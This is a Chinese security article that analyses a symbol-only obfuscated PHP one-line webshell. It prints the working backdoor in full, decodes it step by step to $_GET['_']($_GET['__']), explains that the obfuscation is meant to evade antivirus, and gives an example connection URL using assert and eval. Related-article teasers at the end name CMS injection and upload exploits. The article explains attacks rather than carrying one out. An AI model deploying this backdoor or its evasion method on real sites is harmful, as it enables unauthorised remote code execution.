剖析PHP纯符号一句话webshell的代码

所属分类: 网络安全 / 漏洞分析 阅读数: 103
收藏 0 赞 0 分享


复制代码
代码如下:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
${'_'.$_}['_'](${'_'.$_}['__']);
?>

以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

第一行:$_="";
定义一个以下划线作为命名的字符变量:$_,赋值为空。
此行实际上不影响代码执行效果,仅增加混淆效果。

第二行:$_[+""]='';
定义一个$_数组元素,其key为+"",赋值为空。
众所周知,PHP是个弱类型语言,也就是说PHP并不严格验证变量类型,所以这里+""作为数组了key,其值等同于0,所以此行等同于$_[0]='';
此时$_被定义为数组,覆盖上一行的定义。

第三行:$_="$_"."";
将变量$_强制转换为字符串,因为此时$_类型为数组,强制转换后的结果为字符串"Array"(string(5) "Array" ),而非数组元素的值。

第四行:$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
这一行涉及到计算机二进制的“或运算”和“异或运算”,这里先简单介绍下这两种运算规则:
1、或运算,符号为 |
运算规则:0|0=0; 0|1=1; 1|0=1; 1|1=1;
简单来说,或运算前后两个对象 只要有 一个为1,其值就为1,否则为0
2、异或运算,符号为 ^
运算规则:0^0=0; 0^1=1; 1^0=1; 1^1=0;
简单来说,异或运算可以看成是判断前后两个对象是否相等的,如果两个对象不同(即为异),则值为1,否则为0

再回到代码上来,此行代码分三个部分($_[+""]|"")、($_[+""]|"")、($_[+""]^""),用连接符“.”号相连,每个部分都是其中两个对象进行"或运算"或"异或运算"。
先看第一部分($_[+""]|""),很明显,这里是$_[+""]和""这两个对象进行“或运算”。
第一个对象$_[+""](也就是$_[0]),要注意其值已经不是第二行定义的空值,因为在第三行时$_变量已经被覆盖定义为字符串“Array”。这里涉及到另一个php知识细节:对于 字符串[数字] 结构,字符串将会当成数组处理,返回以后面数字作为索引的元素值,例如:$x='abcd9.com',则$x[4]='9'。可见,$_[+""]值为字符串“Array”第一字符“A”。
第二个对象""是一个特殊字符(注意:这不是短横,虽然长得很像,实际上是个特殊字符,此类符号在某些环境下无法识别而作为乱码处理。后面两部分中的特殊字符也如此。),暂不管为什么此处是这个特殊字符而不是其他字符,先在此行下增加一行测试代码显示这一行定义的$_值:
var_dump($_);
测试结果为:string(3) "GET" ,可见,($_[+""]|"").($_[+""]|"").($_[+""]^"")值"GET",显而易见,($_[+""]|"")值为“G”,($_[+""]|"")值为“E”,($_[+""]^"")值为“T”。
再先看第一部分($_[+""]|"")值为"G",上面已得到$_[+""]值为“A”,即("A"|"")="G",下面分析下此等式:
“A”二进制:0100 0001
“G”二进制:0100 0111
0100 0001 | x = 0100 0111
通过或运算规则推导并参考ASCII码对照表,x值可能有以下几个结果:

复制代码
代码如下:

01000110 //ASCII可显示字符:F
01000111 //ASCII可显示字符:G
00000110 //ASCII控制字符:ACK,代表“确认回应”
00000111 //ASCII控制字符:BEL,代表“响铃”

代码中的""即为ASCII控制字符:ACK。其实另外三个字符也适用,为了增加混淆效果故采用这种特殊字符。
搞清楚第一部分,第二、第三部分也同理可推。

第五行:${'_'.$_}['_'](${'_'.$_}['__']);
此行可通过小括号分成两部分:${'_'.$_}['_'] 和 ${'_'.$_}['__'],两部分结构均是${A}['B'],区别仅是后面B是一条下划线还是两条小划线。
先看相同部分${'_'.$_},这里涉及到大括号{}在php中的特性一个:在变量间接引用中进行定界,如"$abc"为变量$abc,而"${a}bc"为变量$a连接字符"bc",了解了这一特性,而第四行对$_赋值为“GET”,可见${'_'.$_}即为变量$_GET,加上后面['_'],则为$_GET['_'],接收"get"的表单中的变量为'_'的值。小括号里的部分同理。
根据上面叙述,第五行代码还原后是:$_GET['_']($_GET['__']);

至此,这段混淆代码已原形毕露,一句话后门代码原形为:$_GET['_']($_GET['__']),传递特殊参数构建webshell链接网址(例如:http://www.test.com/webshell.php?_=assert&__=eval($_POST['a'])),通过一句话木马客户端即可连接此URL。

更多精彩内容其他人还在看

.Net开发人员常犯的6大安全错误

  微软已经为.Net环境添加了大量的功能,帮助开发人员创建安全的应用程序,例如,身份验证已经成为开发环境集成的一个功能,另外,默认情况下调试消息被禁用掉了。微软对安全的关注程度极大地影响了开发人员,促使他们在软件开发过程中重新评估纳入安全保障的重要性。
收藏 0 赞 0 分享

科汛 KesionCMS 文件名解析漏洞

科汛cms,eshop系统建站第一品牌.专业提供开源cms项目定制服务及名片系统,在线输出,在线印刷,广告制作,在线图文下单系统提供商。
收藏 0 赞 0 分享

科讯 kesioncms 5.5以下漏洞拿shell方法原理总结(图文)

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。
收藏 0 赞 0 分享

DISCUZ X1.5 本地文件包含漏洞说明

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
收藏 0 赞 0 分享

织梦网官方(dedecms)爆路径最新漏洞

  首发:红科网安   作者:Amxking   漏洞程序:dedecms5.5   测试对象:织梦网CMS官方网站   提交时间:2010-03-17   漏洞类型:信息泄露   危险等级:低   漏洞描述:   dedecms 5.5程序泄露网站路径信息。     测试地址:
收藏 0 赞 0 分享

ewebeditor通杀鸡肋0day漏洞

先访问这个地址 Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp 访问这个地址可以建立个A.ASP的文件夹…… 再用这个html代码
收藏 0 赞 0 分享

PHP漏洞全解

PHP网页的安全性问题,针对PHP的网站主要存在下面几种攻击方式
收藏 0 赞 0 分享

ecshop爆绝对路径的bug

  ecshop爆绝对路径的bug   网址如下"   http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/s
收藏 0 赞 0 分享

dedecms织梦 v5.5 两处跨站漏洞

  影响版本:   dedecms织梦5.5   漏洞描述:   demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&
收藏 0 赞 0 分享

dedecms 5.6的最新注入漏洞

  最新dedecms 5.6的注入代码:   http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28
收藏 0 赞 0 分享
查看更多